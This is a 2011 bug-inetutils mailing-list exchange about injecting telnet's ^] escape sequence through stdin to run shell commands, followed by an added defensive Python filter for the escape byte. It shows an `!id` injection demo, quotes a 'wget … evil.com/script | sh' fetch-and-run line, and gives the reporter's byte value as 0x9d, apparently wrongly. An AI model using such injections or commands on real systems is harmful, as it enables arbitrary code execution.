bug-inetutils

Re: [bug-inetutils] telnet security advisory


From: sha0
Subject: Re: [bug-inetutils] telnet security advisory
Date: Mon, 3 Oct 2011 14:20:45 +0200

Hi Simon, 

I know this is a "feature", but connecting the stdin of telnet with any kind of controllable input will lead to command execution; it is a dangerous default option.

I also have another vulnerability related to the stdin parser; it is a SIGSEGV. I'm studying whether I can control the movl to overwrite a function pointer in memory in order to get execution,

But the attack vector is also stdin, so the attack vector is "rare".


regards.


2011/10/3 Simon Josefsson <address@hidden>
sha0 <address@hidden> writes:

> Hello,
>
> It is possible to inject an escape sequence via stdin to telnet, and arbitrary
> commands will be executed,

Hi!  Thanks for studying InetUtils for security problems.  I'm not sure
I follow your "attack" though.

> for example:
>
>
>  #  cat evil-file | telnet 127.0.0.1 80
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
>
> telnet> !id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
> 0(wheel),19(log)
> Connection closed by foreign host.
>
>
> I think it is very dangerous, even though few admins use telnet for moving files
> like this

Yes it is dangerous, so don't do that.  Use ftp to transfer files.

> 3. DESCRIPTION
> -------------------------
> When telnet is used to transfer files to a remote TCP port, a very dangerous
> vulnerability is present that allows remote arbitrary code execution.

The attack seems to be based on tricking the local root user into doing
something stupid.  This is similar to asking the local root user to do
'wget -O - http://evil.com/script | sh'.  There is no security bug in
wget or sh just because that is possible.

> 7. SOLUTION
> -------------------------
> The stdin parser must filter the 0x9d byte.

The ^] escape sequence is a documented feature, so I don't think that is
a solution.

You can use the command line parameter -E to inhibit the escape
character if you want.  Quoting 'telnet --help':

 -E, --no-escape            use no escape character

/Simon
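The thread turns on one mechanism: the telnet client treats the escape character '^]' (Ctrl-], ASCII 0x1d) in its input as the start of a local command line, and a command line beginning with '!' is handed to a shell. The following is an added example, not code from the thread or from InetUtils: a defender-side pre-filter that scans data before it is piped into telnet, reports every escape byte together with the command line that would follow it, and returns a copy with the escape bytes removed. The sample input is constructed for the example; it mirrors the `!id` case above. Function names and the byte-stream handling are assumptions of this example, not InetUtils behaviour.

```python
"""Pre-filter for data that will be fed to the telnet client's stdin.

Added example for the bug-inetutils thread; not part of InetUtils.
The telnet client's default escape character '^]' is ASCII 0x1d (GS).
Everything after it up to end of line is read as a telnet command, and a
command starting with '!' is executed by a shell.
"""
from typing import List, Tuple

TELNET_ESCAPE = 0x1D  # '^]' = Ctrl-] = 0x1d (GS), the default escape character


def find_escapes(data: bytes, escape: int = TELNET_ESCAPE) -> List[Tuple[int, bytes]]:
    """Return (offset, command_line) for every escape byte in data.

    The command line is the bytes after the escape byte up to the next
    newline (trailing CR stripped), or to end of data if no newline follows.
    """
    hits: List[Tuple[int, bytes]] = []
    needle = bytes([escape])
    pos = 0
    while True:
        idx = data.find(needle, pos)
        if idx < 0:
            break
        end = data.find(b"\n", idx + 1)
        if end < 0:
            end = len(data)
        hits.append((idx, data[idx + 1:end].rstrip(b"\r")))
        pos = idx + 1
    return hits


def shell_escapes(data: bytes, escape: int = TELNET_ESCAPE) -> List[Tuple[int, bytes]]:
    """Subset of hits whose command line begins with '!' (shell escape)."""
    return [(off, cmd) for off, cmd in find_escapes(data, escape)
            if cmd.lstrip().startswith(b"!")]


def strip_escapes(data: bytes, escape: int = TELNET_ESCAPE) -> bytes:
    """Copy of data with every escape byte removed.

    The text that followed the escape byte is left in place; without the
    escape byte it is sent to the remote host as ordinary data instead of
    being interpreted locally as a telnet command.
    """
    return data.replace(bytes([escape]), b"")


# Constructed sample: an HTTP request followed by an embedded escape
# sequence, the shape of the 'evil-file' described in the thread.
SAMPLE = b"GET / HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n\x1d!id\r\n"


if __name__ == "__main__":
    for off, cmd in find_escapes(SAMPLE):
        print(f"escape byte at offset {off}, telnet command line: {cmd!r}")
    print("shell escapes:", shell_escapes(SAMPLE))
    print("cleaned:", strip_escapes(SAMPLE))
```

A stricter alternative is to refuse the input outright whenever `shell_escapes` is non-empty. Either way, the mitigation Simon names still applies on the telnet side: running `telnet -E host port < file` disables the escape character entirely, so the filter above is a second check on the data rather than a replacement for `-E`.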

